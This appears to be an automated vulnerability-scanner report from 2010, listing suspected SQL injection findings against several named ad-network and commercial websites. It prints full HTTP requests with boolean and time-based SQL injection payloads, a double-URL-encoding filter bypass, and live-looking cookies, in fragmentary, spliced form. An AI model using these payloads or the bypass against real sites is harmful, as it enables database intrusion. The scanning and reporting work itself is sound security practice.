var multiAdPack = { "encoding":"UTF-8", "version":"1.1", "reqtype":"ac", "ads":[ {"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ph2bt2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=59588b4a-0262-11e0-bc79-3f914c26f4f7/B=brIcA0S0q98-/J=1291768225085491/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=59588b4a-0262-11e0-bc79-3f914c26f4f7&T=19e0vj2eg%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3572157642%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTU4OGI0YS0wMjYyLTExZTAtYmM3OS0zZjkxNGMyNmY0ZjciIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTAxMzA2OCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d49A9B444&U=13u1adgp2%2fN%3dbrIcA0S0q98-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|59588b4a-0262-11e0-bc79-3f914c26f4f7--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac4.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->", "type":"text/html", "id":"0", "size":["130x70"], "slug":false, "secure":false}, {"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGloNmIwZShnaWQkNTk1ODhiNGEtMDI2Mi0xMWUwLWJjNzktM2Y5MTRjMjZmNGY3LHN0JDEyOTE3NjgyMjUwMTMwNjgsc2kkMjExMDUxLHYkMS4wLGFpZCRLcm9WcGtTMHFVay0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h ...[SNIP]...
Request 2
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d2--%20=1 HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:30:25 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=d6sobqp6ftkd1&t=1291768225;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19313
The sltId2 parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sltId2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d1--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:25:22 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=brjll816ftk3i&t=1291767922;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19323
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d2--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:25:22 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=0lbrjth6ftk3i&t=1291767922;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19333
1.120. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sanfrancisco.giants.mlb.com
Path:
/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 86828936%20or%201%3d1--%20 and 86828936%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.jsp?c_id=sf&186828936%20or%201%3d1--%20=1 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=599 Expires: Wed, 08 Dec 2010 01:22:45 GMT Date: Wed, 08 Dec 2010 01:12:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139605
GET /index.jsp?c_id=sf&186828936%20or%201%3d2--%20=1 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=599 Expires: Wed, 08 Dec 2010 01:22:46 GMT Date: Wed, 08 Dec 2010 01:12:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139595
The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 11807099'%20or%201%3d1--%20 and 11807099'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
1.124. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://tap.rubiconproject.com
Path:
/oz/sensor
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The put_1986 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1986 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d1--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;
Response 1
HTTP/1.1 204 No Content Date: Wed, 08 Dec 2010 01:28:01 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: dq=17|1|16|0; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: lm="8 Dec 2010 01:28:02 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
Request 2
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d2--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;
The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads 19221418'%20or%201%3d1--%20 and 19221418'%20or%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 35022 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /js'waitfor%20delay'0%3a0%3a20'--/bk-static.js HTTP/1.1 Host: www.bkrtx.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #97.a675aad1.1291772182.225ed38 </BODY></HTML>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload %2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d was submitted in the REST URL parameter 2. The application took 34085 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/bk-static.js%2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d HTTP/1.1 Host: www.bkrtx.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #97.a675aad1.1291772456.226aa26 </BODY></HTML>
The t_mtype parameter appears to be vulnerable to SQL injection attacks. The payloads 49362984'%20or%201%3d1--%20 and 49362984'%20or%201%3d2--%20 were each submitted in the t_mtype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d1--%20 HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:37:30 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768650859840; path=/; expires=Tue, 03-Dec-30 00:37:30 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=04qimd7i4eptlr5qrb61n69d61; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445704; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27519
